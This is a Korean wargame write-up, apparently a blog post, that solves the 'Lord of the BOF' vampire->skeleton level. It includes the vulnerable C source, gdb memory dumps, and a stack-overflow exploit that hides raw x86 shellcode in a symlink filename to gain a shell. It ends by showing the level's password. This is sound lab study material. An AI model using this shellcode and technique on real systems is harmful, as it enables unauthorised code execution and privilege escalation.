10.lob vampire->skeleton

2018. 1. 8. 22:26

[vampire@localhost vampire]$ cat skeleton.c

The Lord of the BOF : The Fellowship of the BOF

- skeleton

- argv hunter

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i, saved_argc;

if(argc < 2){

printf("argv error\n");

exit(0);

}

// egghunter

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

// check the length of argument

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}

// argc saver

saved_argc = argc;

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

// buffer hunter

memset(buffer, 0, 40);

// ultra argv hunter! argv를 모두 0으로 초기화한다.

for(i=0; i<saved_argc; i++)

memset(argv[i], 0, strlen(argv[i]));

}

8번 문제인 orge->troll문제와 비슷하지만 추가된 점은 argv[i]가 모두 제한되었다는 점이다.!

8번 문제와 동일하게 etc영역에 쉘코드가 들어가도록 심볼릭링크를 이용하여 쉘코드를 이름으로 사용하기로 한다.

심볼릭링크를 이용하면 '\x2f'가 '/'로 인식이 되기때문에 '\x2f'가 없는 쉘코드를 사용해 주어야 한다.

[vampire@localhost /tmp]$ ln -s skeleto1 `python -c 'print "\x90"*100+"\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6"'`

[vampire@localhost /tmp]$ gdb ./`python -c 'print "\x90"*100+"\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6"'`

(gdb) r `python -c 'print "\x90"*44+"\xbf\xbf\xbf\xbf"'`

Starting program: /tmp/./▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒t$▒▒i▒])ɱ

1EE▒▒▒▒b▒▒|G▒▒Rp▒▒8{▒Q▒▒▒▒-▒ѶO▒▒▒▒4@▒QM▒▒▒ `python -c 'print "\x90"*44+"\xbf\xbf\xbf\xbf"'`

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒

Program received signal SIGSEGV, Segmentation fault.

0xbfbfbfbf in ?? ()

(gdb) disas main

Dump of assembler code for function main:

중간 생략

0x8048641 <main+321>: call 0x80483f0 <strlen>

0x8048646 <main+326>: add $0x4,%esp

0x8048649 <main+329>: mov %eax,%eax

0x804864b <main+331>: push %eax

0x804864c <main+332>: push $0x0

0x804864e <main+334>: mov 0xffffffd4(%ebp),%eax

0x8048651 <main+337>: lea 0x0(,%eax,4),%edx

0x8048658 <main+344>: mov 0xc(%ebp),%eax

0x804865b <main+347>: mov (%eax,%edx,1),%edx

0x804865e <main+350>: push %edx

0x804865f <main+351>: call 0x8048430 <memset>

0x8048664 <main+356>: add $0xc,%esp

0x8048667 <main+359>: incl 0xffffffd4(%ebp)

---Type <return> to continue, or q <return> to quit---

0x804866a <main+362>: jmp 0x8048623 <main+291>

0x804866c <main+364>: lea 0x0(%esi,1),%esi

0x8048670 <main+368>: leave

0x8048671 <main+369>: ret

(gdb) b* main +368

Breakpoint 1 at 0x8048670

프로그램 맨 마지막 쯤에 bp를 걸어주고 ret주소를 \xbfbfbfbf로 덮어주고 한번 더 실행시켜 주었다.

(gdb) r `python -c 'print "\x90"*44+"\xbf\xbf\xbf\xbf"'`

The program being debugged has been started already.

Start it from the beginning? (y or n) y

1EE▒▒▒▒b▒▒|G▒▒Rp▒▒8{▒Q▒▒▒▒-▒ѶO▒▒▒▒4@▒QM▒▒▒ `python -c 'print "\x90"*44+"\xbf\xbf\xbf\xbf"'`

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒

후에 etc 메모리 영역 어디에 nop와 쉘코드가 들어갔는지 파악해준다.

(gdb) x/256x 0xbfffffff -256

0xbffffeff: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff0f: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff1f: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff2f: 0x00000000 0x00000000 0x00000000 0x00000000

0xbfffff3f: 0x00000000 0x00000000 0x2f000000 0x2f706d74

0xbfffff4f: 0x90902f2e 0x90909090 0x90909090 0x90909090

0xbfffff5f: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffff6f: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffff7f: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffff8f: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffff9f: 0x90909090 0x90909090 0x90909090 0x90909090

0xbfffffaf: 0x90909090 0xc5d99090 0xf42474d9 0x69c315b8

0xbfffffbf: 0xc9295dd7 0x45310bb1 0x1a45031a 0xe204c583

0xbfffffcf: 0x8f62a9e0 0x47137c93 0x7052e38e 0x1717ccb8

0xbfffffdf: 0x85f77b38 0xa98e1551 0x2d9801f3 0x4fb6d1f3

0xbfffffef: 0xfce7bf9a 0x51af4034 0xd682a14d 0x00000000

0xbfffffff: Cannot access memory at address 0xbfffffff

ret주소를 0xbfffff6f 쯤으로 하면 안전하게 nop를 타고 쉘코드가 실행 될 것 같다.

[vampire@localhost vampire]$ ln -s skeleton `python -c 'print "\x90"*100+"\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6"'`

[vampire@localhost vampire]$ ./`python -c 'print "\x90"*100+"\xd9\xc5\xd9\x74\x24\xf4\xb8\x15\xc3\x69\xd7\x5d\x29\xc9\xb1\x0b\x31\x45\x1a\x03\x45\x1a\x83\xc5\x04\xe2\xe0\xa9\x62\x8f\x93\x7c\x13\x47\x8e\xe3\x52\x70\xb8\xcc\x17\x17\x38\x7b\xf7\x85\x51\x15\x8e\xa9\xf3\x01\x98\x2d\xf3\xd1\xb6\x4f\x9a\xbf\xe7\xfc\x34\x40\xaf\x51\x4d\xa1\x82\xd6"'` `python -c 'print "\x90"*44+"\x6f\xff\xff\xbf"'`

▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒o▒▒▒

bash$ whoami

skeleton

bash$ my-pass

euid = 510

shellcoder

'System Hacking > Lord of Buffer overflow' 카테고리의 다른 글

12.lob golem->darknight (0)	2018.01.09
11.lob skeleton->golem (0)	2018.01.08
09.lob troll->vampire (0)	2018.01.08
08.lob orge->troll (0)	2018.01.08
07.lob darkelf->orge (0)	2018.01.08

oiehso0

10.lob vampire->skeleton

'System Hacking > Lord of Buffer overflow' 카테고리의 다른 글

+ Recent posts

티스토리툴바